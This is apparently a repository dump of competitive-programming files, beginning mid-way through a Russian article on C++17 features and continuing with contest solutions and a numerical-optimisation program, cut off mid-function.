second;\n};\n\n// Мой вывод типа\ntemplate<typename T, typename U>\nS(const T &first, const U &second) -> S<T, U>;\n\n```\n**Note**: компилятор обычно сам может создать правило вывода из конструктора, но в этом примере конструктора нет, поэтому правило вывода написано руками.\n\n### `*this` capture in lambda expressions (Захват `*this` в лямбда-функциях)\n\nЯ не думаю, что это особо полезно в спортивном программировании, но кто знает:\n\n```\nstruct someClass\n{\n int x = 0;\n\n void f() const\n {\n cout << x << '\\n';\n }\n\n void g()\n {\n x++;\n }\n\n // C++14\n void func()\n {\n auto lambda1 = [self = *this]() { self.f(); };\n auto lambda2 = [self = *this]() mutable { self.g(); };\n lambda1();\n lambda2();\n }\n\n // C++17\n void funcNew()\n {\n auto lambda1 = [*this]() { f(); };\n auto lambda2 = [*this]() mutable { g(); };\n lambda1();\n lambda2();\n }\n};\n\n```\n[Статья](https://habrahabr.ru/company/infopulse/blog/341264/) о ключевом слове `mutable`.\n\n### Structured bindings (Структурные связывания?)\n\n* Самое полезное нововведение $---$ синтаксический сахар для декомпозиции объектов.\n\n```\ntemplate<typename T>\nstruct point\n{\n T x;\n T y;\n point(T x, T y) : x(x), y(y) {}\n};\n\nvector<point<int>> points = {{0, 0}, {1, 0}, {1, 1}, {1, 0}};\n//C++11\nfor (auto& point : points)\n{\n int x, y;\n tie(x, y) = point;\n //...Какая-то сложная логика с x и y\n}\n\n//C++17\nfor (auto& [x, y] : points)\n{\n //...Какая-то сложная логика с x и y\n}\n```\n\n* Итерирование по map'у:\n\n```\nmap<int, string> m;\nfor (auto [key, value] : m)\n cout << \"key: \" << key << '\\n' << \"value: \" << value << '\\n';\n```\n\n* Хорошим примером использования может служить задача [problem:938D]. Код со структурным связыванием (Алгоритм Дейкстры) становится намного понятнее и читаемее: сравните [submission:35474147] и [submission:35346635].\n\n```\nwhile (!q.empty())\n{\n auto [dist, u] = *q.begin();\n q.erase(q.begin());\n used[u] = true;\n for (auto& [w, v] : g[u])\n if (!used[v] && d[v] > dist + 2 * w)\n q.erase({d[v], v}),\n d[v] = dist + 2 * w,\n q.insert({d[v], v});\n}\n```\n\n### Инициализатор в `if` и `switch`\n\n```\nset<int> s;\n\nif (auto [iter, ok] = s.insert(42); ok)\n{\n //...\n}\nelse\n{\n //`ok` и `iter` доступны в этой области видимости\n}\n//А здесь недоступны\n```\n\n### Новые атрибуты\n\n* `[[fallthrough]]` атрибут сообщает о том, что break в данном месте пропущен намеренно:\n\n```\nint requests, type;\ncin >> requests;\nfor (int q = 0; q < requests; ++q)\n switch (cin >> type; type) //Используем инициализатор в switch\n {\n case 1:\n int l, r;\n cin >> l >> r;\n //Обработаем запрос первого типа\n break;\n case 2:\n [[fallthrough]];\n //Предупреждение компилятора будет подавлено!\n case 3:\n int value;\n cin >> value;\n //Обработаем запрос второго и третьего типа.\n }\n```\n\n* `[[nodiscard]]` атрибут используется, чтобы показать, что возвращаемое значение функции не может быть отброшено. Может использоваться на типах.\n\n### std::optional\n\n```\noptional<int> findPath(graph g, int from, int to)\n{\n //Find path from `from` to `to`\n if (d[to] != INF)\n return d[to];\n return {}\n}\n\n//Проверим, что путь существует\nif (auto dist = findPath(...); dist.hasValue())\n cout << dist.value(); //Получим его\nelse\n cout << -1;\n\n//Или сразу используем defaultValue, если значение не было установлено\ncout << findPath(...).value_or(-1); //Выводит расстояние если оно найдено и -1 иначе\n```\n\n### Неконстантное(ый?, ая?) string::data\n\nДля любителей С:\n\n```\nstring str = \"hello\";\nchar *p = str.data();\np[0] = 'H';\ncout << str; // Hello\n```\n\n### Свободные функции std::size, std::data и std::empty\n\nВ добавку к уже существующим свободным функциям std::begin, std::end и другим, появились новые, такие как: std::size, std::data и std::empty:\n\n```\nvector<int> v = { 3, 2, 5, 1, 7, 6 };\n\nsize_t sz = size(v);\nbool empty = empty(v);\nauto ptr = data(v);\n```\n\n### std::clamp\n\nВозвращает `x`, если оно попало в интервал `[low, high]` и ближайшее значение иначе:\n\n```\ncout << clamp(7, 0, 10); //7\ncout << clamp(7, 0, 5); //5\ncout << clamp(7, 10, 50); //10\n```\n\nЯ думаю, что это полезная функция, но будет сложно вспомнить как она называется в течение контеста :)\n\n### GCD and LCM! (НОД и НОК)\n\n```\ncout << gcd(24, 60); // 12\ncout << lcm(8, 10); // 40\n```\n\n### Возвращаемое значение у `emplace_back`\n\n```\nvector<int> v = { 1, 2, 3 };\n\nauto &r = v.emplace_back(10);\nr = 42;\n//v теперь содержит {1, 2, 3, 42}\n```\n\n### Функции в std::map:\n\n* Extract (можно даже поменять ключ!!!)\n\n```\nmap<int, string> myMap{ { 1, \"Gennady\" }, { 2, \"Petr\" }, { 3, \"Makoto\" } };\nauto node = myMap.extract(2);\nnode.key() = 42;\nmyMap.insert(move(node));\n\n// myMap: {{1, \"Gennady\"}, {42, \"Petr\"}, {3, \"Makoto\"}};\n```\n\n**Note**: Extract $---$ единственный способ поменять ключ элемента map'а без reallocation(реаллокации?)\n\nАсимптотика: \nextract(key): $O(\\log(N))$ [doc](http://en.cppreference.com/w/cpp/container/map/extract) \nextract(iterator): $O(1)$ amortized [doc](http://en.cppreference.com/w/cpp/container/map/extract)\n\n* Merge\n\n```\nmap<int, string> m1{ { 1, \"aa\" }, { 2, \"bb\" }, { 3, \"cc\" } }; \nmap<int, string> m2{ { 4, \"dd\" }, { 5, \"ee\" }, { 6, \"ff\" } };\nm1.merge(m2);\n// m1: { {1, \"aa\"}, {2, \"bb\"}, {3, \"cc\"}, {4, \"dd\"}, {5, \"ee\"}, {6, \"ff\"} }\n// m2: {}\n```\n\nАсимптотика: $O(N \\log(N + M))$ [doc](http://en.cppreference.com/w/cpp/container/map/merge)\n\n* Раньше, чтобы понять, произошла вставка в map или обновление, необходимо было сначала найти элемент, а потом использовать operator[]. Теперь появилась функция insert_or_assign:\n\n```\nmap<int, string> m;\nm.emplace(1, \"aaa\");\nm.emplace(2, \"bbb\");\nm.emplace(3, \"ccc\");\n\nauto [it1, inserted1] = m.insert_or_assign(3, \"ddd\");\ncout << inserted1; // 0\n\nauto [it2, inserted2] = m.insert_or_assign(4, \"eee\");\ncout << inserted2; // 1\n```\n\nАсимптотика: $O(\\log(N))$ [doc](http://en.cppreference.com/w/cpp/container/map/emplace)\n\n### Более строгий порядок вычисления выражений\n\nВ C++17 появились новые правила, более строго определяющие порядок вычисления выражений:\n\n* Постфиксные выражения вычисляются слева направо (в том числе вызовы функций и доступ к членам объектов)\n* Выражения присваивания вычисляются справа налево.\n* Операнды операторов << и >> вычисляются слева направо.\n\nТаким образом, как указывается в предложении к стандарту, в следующих выражениях теперь гарантированно сначала вычисляется a, затем b, затем c:\n\n```\na.b\na->b\na->*b\na(b1, b2, b3)\nb @= a\na[b]\na << b << c\na >> b >> c\n```\n\n**Note**: Порядок вычисления b1, b2, b3 все еще не определен.\n\nP.S.: Все материалы адаптированы мной с примерами [отсюда](https://habrahabr.ru/company/pvs-studio/blog/340014/) \n" }, { "alpha_fraction": 0.43545669317245483, "alphanum_fraction": 0.4492753744125366, "avg_line_length": 36.55696105957031, "blob_id": "ec533835cdbd6450755aac630a41cc18bc2bd2ca", "content_id": "182b90f3dc98ee38f501a10e2e8ac52b61c02998", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2967, "license_type": "no_license", "max_line_length": 928, "num_lines": 79, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.15/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <queue>\n\n#define enter printf(\"\\n\");\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define vi vector<int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"matching\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');}\nstring s[5];\nstring nums[5] = {\n\"*** * *** *** * * *** *** *** *** *** \",\n\"* * * * * * * * * * * * * * \",\n\"* * * *** *** *** *** *** * *** *** \",\n\"* * * * * * * * * * * * * \",\n\"*** * *** *** * *** *** * *** *** \"};\n\nint f(int i)\n{\n for (int asdf = 0; asdf <= 9; asdf++)\n {\n bool ok = true;\n for (int j = 0; j < 5 && ok; j++)\n for (int k = 0; k < 3 && ok; k++)\n if (s[j][i * 4 + k] != nums[j][asdf * 4 + k])\n ok = false;\n if (ok)\n return asdf;\n }\n return -1;\n}\n\nvoid run()\n{\n char c;\n forn(i, 5)\n {\n while (true)\n {\n scanf(\"%c\", &c);\n if (c == ' ' || c == '*')\n s[i] += c; else\n break;\n }\n }\n int n = (s[0].size() + 1) / 4;\n int num = 0, k = 0;\n for (int i = n - 1; i >= 0; i--)\n {\n k = f(i);\n if (k < 0)\n break;\n num = num * 10 + k;\n }\n printf(k < 0 || num % 6 != 0 ? \"BOOM!!\\n\" : \"BEER!!\\n\");\n}\n\nint main()\n{\n // freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n// freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.43683764338493347, "alphanum_fraction": 0.4940652847290039, "avg_line_length": 29.83660125732422, "blob_id": "73905d1977ceca98d913143a4c4d23ea3bcf7f8f", "content_id": "fe9f9143f8d3f4bbddcbcf5bf6a1664a215282a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9436, "license_type": "no_license", "max_line_length": 127, "num_lines": 306, "path": "/Ann/mnogomern2.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n#include <ctime>\n\n#define MAXN 5\nusing namespace std;\nusing namespace std::placeholders;\n\nstatic const double eps = 0.01;\nstatic const double delta = 0.001;\nstatic const double l = 0;\n\nvoid writeln(pair<double, double> a)\n{\n printf(\"%.7f %.7f\\n\", a.first, a.second);\n}\n\ndouble f(double x1, double x2)\n{\n return x1 * x1 - 8. * x1 + x2 * x2;\n}\n\nlong long cnk[MAXN][MAXN];\n\nvoid build_cnk()\n{\n for (int i = 0; i < MAXN; i++)\n cnk[i][0] = 1ll;\n for (int i = 1; i < MAXN; i++)\n for (int j = 1; j < MAXN; j++)\n cnk[i][j] = cnk[i - 1][j] + cnk[i - 1][j - 1];\n}\n\nauto d2f(std::function<double(double, double)> f) -> decltype(f)\n{\n return [f](double x, double y)\n {\n double ans = f(x + delta, y) - f(x, y);\n double t = ans;\n int sign = -1;\n for (int i = 1; i <= MAXN; i++, sign *= -1)\n {\n double tcur = 0;\n for (int j = 0, s = 1; j <= i; j++, s *= -1)\n tcur += s * cnk[i][j] * f(x + delta * (i - j + 1), y);\n t = tcur - t;\n ans += sign * t / (i + 1);\n }\n return ans / delta;\n };\n}\n\nauto df(std::function<double(double)> f) -> decltype(f)\n{\n return bind(d2f([f](double x, double y){return f(x);}), _1, 0);\n}\n\ndouble minimize(std::function<double(double)> f) //Newton method for minimization of one-dimensional function\n{\n for (double x = -df(f)(0) / df(df(f))(0); ; x -= df(f)(x) / df(df(f))(x))\n if (fabs(df(f)(x)) <= eps)\n return x;\n}\n\ndouble fx1(double x1, double x2)\n{\n return df(bind(f, _1, x2))(x1);\n}\n\ndouble fx2(double x1, double x2)\n{\n return df(bind(f, x1, _1))(x2);\n}\n\nbool check(double x1, double x2)\n{\n writeln({x1, x2});\n return (fabs(fx1(x1, x2)) <= eps && fabs(fx2(x1, x2)) <= eps);\n}\n\npair<double, double> coordinateDown()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 0;\n double start = clock();\n double x, temp, mn, val;\n while (!check(x1, x2))\n {\n countOfOperations++;\n x1 = minimize(bind(f, _1, x2));\n x2 = minimize(bind(f, x1, _1));\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\npair<double, double> gradientDownFragmentation(std::function<double(double, double)> f)\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 0;\n double start = clock();\n double alpha = 1, x11, x21, t;\n auto fx1 = [&f](double x1, double x2){return df(bind(f, _1, x2))(x1);};\n auto fx2 = [&f](double x1, double x2){return df(bind(f, x1, _1))(x2);};\n while (fabs(fx1(x1, x2)) >= eps || fabs(fx2(x1, x2)) >= eps)\n {\n countOfOperations++;\n t = f(x1, x2);\n while (true)\n {\n x11 = x1 - alpha * fx1(x1, x2);\n x21 = x2 - alpha * fx2(x1, x2);\n if (f(x11, x21) > t)\n alpha /= 2;\n else\n break;\n }\n x1 = x11;\n x2 = x21;\n }\n return {x1, x2};\n}\n\npair<double, double> gradientDownConst()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 0;\n double start = clock();\n double alpha = 0.1;\n while (!check(x1, x2))\n {\n countOfOperations++;\n x1 = x1 - alpha * fx1(x1, x2);\n x2 = x2 - alpha * fx2(x1, x2);\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\npair<double, double> fastestGradientDown(std::function<double(double, double)> f)\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 0;\n double start = clock();\n double alpha = 1, x11, x21, f1, f2;\n auto fx1 = [&f](double x1, double x2){return df(bind(f, _1, x2))(x1);};\n auto fx2 = [&f](double x1, double x2){return df(bind(f, x1, _1))(x2);};\n auto fun = [&x1, &x2, &f, &fx1, &fx2](double lambda){return f(x1 - lambda * fx1(x1, x2), x2 - lambda * fx2(x1, x2));};\n while (fabs(fx1(x1, x2)) >= eps || fabs(fx2(x1, x2)) >= eps)\n {\n countOfOperations++;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n alpha = minimize(bind(fun, _1));\n x1 = x1 - alpha * f1;\n x2 = x2 - alpha * f2;\n }\n return {x1, x2};\n}\n\npair<double, double> soprDirection()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 1;\n double start = clock();\n double alpha = 1, beta = 0;\n double f1, f2, p1, p2, f1p, f2p;\n p1 = f1 = fx1(x1, x2);\n p2 = f2 = fx2(x1, x2);\n auto fun = [&x1, &x2, &p1, &p2](double lambda){return f(x1 - lambda * p1, x2 - lambda * p2);};\n alpha = minimize(bind(fun, _1));\n x1 = x1 - alpha * p1;\n x2 = x2 - alpha * p2;\n while (!check(x1, x2))\n {\n countOfOperations++;\n f1p = f1;\n f2p = f2;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n beta = (f1 * f1 + f2 * f2) / (f1p * f1p + f2p * f2p);\n p1 = f1 + beta * p1;\n p2 = f2 + beta * p2;\n alpha = minimize(bind(fun, _1));\n if (f(x1, x2) <= f(x1 - alpha * p1, x2 - alpha * p2))\n {\n p1 = f1;\n p2 = f2;\n alpha = minimize(bind(fun, _1));\n }\n x2 = x2 - alpha * p2;\n x1 = x1 - alpha * p1;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\npair<double, double> Gradppor()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 1;\n double start = clock();\n double alpha = 1, beta = 0;\n double f1, f2, p1, p2, f1p, f2p, a = 1., b = 0., c = 0., d = 1., q, w, e, r, t, y, u, s, v, h, g, y1, y2;\n auto fun = [&x1, &x2, &p1, &p2](double lambda){return f(x1 - lambda * p1, x2 - lambda * p2);};\n while (!check(x1, x2))\n {\n countOfOperations++;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n p1 = a * f1 + b * f2;\n p2 = c * f1 + d * f2;\n alpha = minimize(bind(fun, _1));\n x1 = x1 - alpha * p1;\n x2 = x2 - alpha * p2;\n y1 = fx1(x1, x2) - f1;\n y2 = fx2(x1, x2) - f2;\n q = a * y1 + b * y2;\n w = c * y1 + d * y2;\n u = q * y1 + w * y2;\n e = (q * y1 * a + q * y2 * c) / u;\n r = (q * y1 * b + q * y2 * d) / u;\n t = (w * y1 * a + w * y2 * c) / u;\n y = (w * y1 * b + w * y2 * d) / u;\n u = (p1 * y1 + p2 * y2) / alpha;\n s = (p1 * p1 * a + p1 * p2 * b) / u;\n v = (p1 * p1 * c + p1 * p2 * d) / u;\n h = (p1 * p2 * a + p2 * p2 * b) / u;\n g = (p1 * p2 * c + p2 * p2 * d) / u;\n a = a - e + s;\n b = b - r + v;\n c = c - t + h;\n d = d - y + g;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\npair<double, double> newton(std::function<double(double, double)> f)\n{\n double x1 = 0, x2 = 0;\n int countOfOperations = 0;\n double start = clock(), f1, f2, x11, x21;\n double q11, q12, q22;\n auto fx1 = [&f](double x1, double x2){return df(bind(f, _1, x2))(x1);};\n auto fx2 = [&f](double x1, double x2){return df(bind(f, x1, _1))(x2);};\n while (fabs(fx1(x1, x2)) >= eps || fabs(fx2(x1, x2)) >= eps)\n {\n countOfOperations++;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n q11 = df(df(bind(f, _1, x2)))(x1);\n q12 = df(bind(d2f(f), x1, _1))(x2);\n q22 = df(df(bind(f, x1, _1)))(x2);\n x1 = x1 - (f1 * q22 - f2 * q12) / (q11 * q22 - q12 * q12);\n x2 = x2 - (-f1 * q12 + f2 * q11) / (q11 * q22 - q12 * q12);\n }\n// cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\ndouble g(double x1, double x2)\n{\n return x1 * x1 + (x2 - 4) * (x2 - 4) - 9;\n}\n\ndouble h(double x1, double x2)\n{\n double mx = max(0., g(x1, x2));\n return mx * mx;\n}\n\npair<double, double> penalty()\n{\n double x1 = 8.0, x2 = 4.;\n int countOfOperations = 0;\n double start = clock(), beta = 1.05, r = 1;\n while (fabs(r * h(x1, x2)) > eps)\n {\n countOfOperations++;\n// auto t = newton([&r](double x1, double x2){return f(x1, x2) + r * h(x1, x2);});\n// auto t = fastestGradientDown([&r](double x1, double x2){return f(x1, x2) + r * h(x1, x2);});\n auto t = gradientDownFragmentation([&r](double x1, double x2){return f(x1, x2) + r * h(x1, x2);});\n writeln({r, r});\n x1 = t.first;\n x2 = t.second;\n r *= beta;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\nint main()\n{\n pair<double, double> temp;\n cout.precision(10);\n build_cnk();\n/* cout << \"coordinate down:\\n\"; temp = coordinateDown(); writeln(temp);\n cout << \"gradient down with const:\\n\"; temp = gradientDownConst(); writeln(temp);\n cout << \"gradient down with fragmentation:\\n\"; temp = gradientDownFragmentation(); writeln(temp);\n cout << \"fastest gradient down:\\n\"; temp = fastestGradientDown(f); writeln(temp);\n cout << \"sopr direction(Fletchera-Rivsa):\\n\"; temp = soprDirection(); writeln(temp);\n cout << \"newton:\\n\"; temp = newton(); writeln(temp);\n cout << \"gradient p poryadka:\\n\"; temp = Gradppor(); writeln(temp);*/\n cout << \"with penalty function:\\n\"; temp = penalty(); writeln(temp);\n return 0;\n}\n" }, { "alpha_fraction": 0.35568276047706604, "alphanum_fraction": 0.38021260499954224, "avg_line_length": 19.74576187133789, "blob_id": "a5c399fa71c4f56cc432777d91060b784c81aed1", "content_id": "ae3810aecbc4a99c8ec4c875c6bd4f270fec5a31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1223, "license_type": "no_license", "max_line_length": 63, "num_lines": 59, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.28/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#define TASKNAME \"\"\n \n#include <bits/stdc++.h>\n \n#define mp make_pair\n#define pb push_back\n#define all(a) (a).begin(), (a).end()\n#define sz(a) (int)a.size()\n#define fst first\n#define snd second\n#define fori(n) for(int i = 0; i < n; ++i)\n#define fori1(n) for(int i = 1; i < n; ++i)\n#define forj(n) for(int j = 0; j < n; ++j)\n \nusing namespace std;\n \nvector <pair <int, int> > ans;\nvector<int> a;\n \nint main()\n{\n // freopen(\"in.in.c\", \"r\", stdin);\n int n;\n cin >> n;\n int x, y, count = 0;\n fori(n)\n {\n cin >> x >> y;\n x -= y;\n a.pb(x);\n if (x > 0)\n count++;\n }\n if (count * 2 > n)\n {\n cout << 0 << \"\\n\";\n return 0;\n }\n fori(n - 1)\n if (a[i] <= 0 && a[i + 1] <= 0 ||\n a[i] > 0 && a[i + 1] <= 0 && a[i] + a[i + 1] > 0 ||\n a[i] <= 0 && a[i + 1] > 0 && a[i] + a[i + 1] > 0)\n ans.pb({i + 1, i + 2}),\n ++i;\n if (count * 2 <= n - ans.size())\n {\n cout << \"-1\\n\";\n return 0;\n }\n else\n {\n int i = 0;\n while (count * 2 <= n - i)\n ++i;\n cout << i << \"\\n\";\n forj(i)\n cout << ans[j].fst << \" \" << ans[j].snd << \"\\n\";\n }\n}" }, { "alpha_fraction": 0.508124053478241, "alphanum_fraction": 0.5413589477539062, "avg_line_length": 24.547170639038086, "blob_id": "5ce681b570e393819680ecda3ee8d4a08b56840d", "content_id": "f93d664c4f38aa8d408337c36b43e5612a3fe691", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1354, "license_type": "no_license", "max_line_length": 123, "num_lines": 53, "path": "/atcoder/abc162/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#include <map>\n#include <numeric>\n#include <iomanip>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n int n;\n cin >> n;\n ll sum = 0;\n fori1(n + 1)\n if (i % 3 && i % 5)\n sum += i;\n cout << sum << endl;\n \n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.4472891688346863, "alphanum_fraction": 0.46536144614219666, "avg_line_length": 19.75, "blob_id": "db77df0cf4060fe3d62a21584c2d58637d9421e8", "content_id": "25b369b5127408b857eadf83b34f780b59b3a529", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 664, "license_type": "no_license", "max_line_length": 55, "num_lines": 32, "path": "/CodeForce/gym/101095/Y.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "def f(): return list(map(int, input().split()))\n\nn, t = f()\ne = f()[0]\ncities = []\nans = [0] * n\nok = 0\nfor i in range(n):\n cities.append([])\nfor i in range(e):\n h, p = f()\n cities[h - 1].append(p)\n\nfor i in range(n):\n cities[i] = list(reversed(sorted(cities[i])))\n if i + 1 == t:\n cities[i] = []\n continue\n j = 0\n while j < len(cities[i]) and cities[i][j] > 0:\n if cities[i][j] > 1:\n cities[i] = cities[i][:-(cities[i][j] - 1)]\n # print(cities[i])\n j += 1\n if j < len(cities[i]):\n ok += 1\n ans[i] = j\n\nif ok == 0:\n print(' '.join(map(str, ans)))\nelse:\n print(\"IMPOSSIBLE\")\n" }, { "alpha_fraction": 0.4958063066005707, "alphanum_fraction": 0.5087830424308777, "avg_line_length": 27.209821701049805, "blob_id": "d2a636ad95bcf57aaa991b4105d0d92e53fb0a72", "content_id": "63d553f0d490dbae14259acf8b192ec590f39263", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6319, "license_type": "no_license", "max_line_length": 167, "num_lines": 224, "path": "/trains/neerc/neerc.ifmo.ru.train.2016.10.18/G.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\n#define ll long long\n#define pb push_back\n#define vi vector<int>\n#define va valarray<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n\n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return v;}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n\n//printAns\nvoid printAnswerAndExit(string a){printf(\"%s\\n\", a.data());exit(0);}\n//Igorjan\n\n#define N 2002\nint n, k, s, t;\nint count[N];\nint parent[N];\nint available[N][N];\nbool g[N][N];\nchar ss[N];\n\nvoid setAvailable(int from, int p, int u)\n{\n if (available[u][from] != -1)\n return;\n available[u][from] = p;\n fori(n)\n if (g[i][u])\n setAvailable(from, u, i);\n};\n\nvoid run()\n{\n scanf(\"%d%d%d%d\\n\", &n, &k, &s, &t);--s;--t;\n fori(n) forj(n) available[i][j] = -1;\n vi a(k);\n fori(k)\n scanf(\"%d\", &a[i]);\n fori(n)\n {\n available[i][i] = i;\n scanf(\"%s\", ss);\n forj(n)\n {\n g[i][j] = ss[j] == '1';\n if (g[i][j])\n available[i][j] = j;\n }\n }\n if (find(whole(a), t + 1) == a.end())\n a.pb(t + 1),++k;\n if (find(whole(a), s + 1) != a.end())\n a.erase(find(whole(a), s + 1)), --k;\n for (int& x: a)--x;\n vector<int> answer;\n vector<bool> used(n, false);\n vector<pii> nodes;\n\n function<void(int)> dfs = [&](int u)\n {\n if (nodes.size() == 0)\n return;\n\n forj(nodes.size())\n {\n int i = nodes[j].second;\n if (i == u)\n return;\n int v = u;\n while (v != i)\n {\n answer.pb(v),\n v = available[v][i];\n }\n u = i;\n }\n };\n\n\tfor (int i = 0; i < n; i++)\n\t\tfor (int u = 0; u < n; u++) {\n\t\t int j = available[u][i];\n\t\t 